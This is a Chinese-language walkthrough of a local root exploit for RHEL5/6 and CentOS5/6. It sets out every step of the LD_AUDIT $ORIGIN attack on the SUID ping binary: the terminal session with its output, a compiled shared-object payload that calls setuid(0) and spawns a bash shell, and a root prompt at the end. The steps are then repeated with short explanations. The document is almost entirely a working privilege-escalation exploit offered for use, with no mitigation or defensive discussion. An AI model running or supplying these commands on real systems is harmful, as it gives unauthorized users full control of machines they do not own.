摘要
利用 /tmp 目录权限、SUID 权限和 C 语言使普通账号提权为 root 权限
适用于 RHEL5-RHEL6、CentOS5-CentOS6，均可以提权
提权方法
[moonsec@localhosttmp]$ mkdir /tmp/exploit
[moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhosttmp]$ exec 3< /tmp/exploit/target
[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhosttmp]$ rm -rf /tmp/exploit/
[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)
[moonsec@localhosttmp]$ cat > payload.c
void__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[moonsec@localhosttmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhosttmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhosttmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhosttmp]# whoami
创建目录
mkdir /tmp/exploit
创建 target 文件的硬链接
ln /bin/ping /tmp/exploit/target
以文件描述符 3 打开 target 文件并保持打开
exec 3< /tmp/exploit/target
查看文件描述符 3 当前指向的路径
ls -l /proc/$$/fd/3
删除目录
rm -rf /tmp/exploit/
输入 C 代码
cat > payload.c
void__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
编译文件
gcc -w -fPIC -shared -o /tmp/exploit payload.c
提升到 root 权限
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
CentOS 5.5 上，用户 moonsec 提权到 root 权限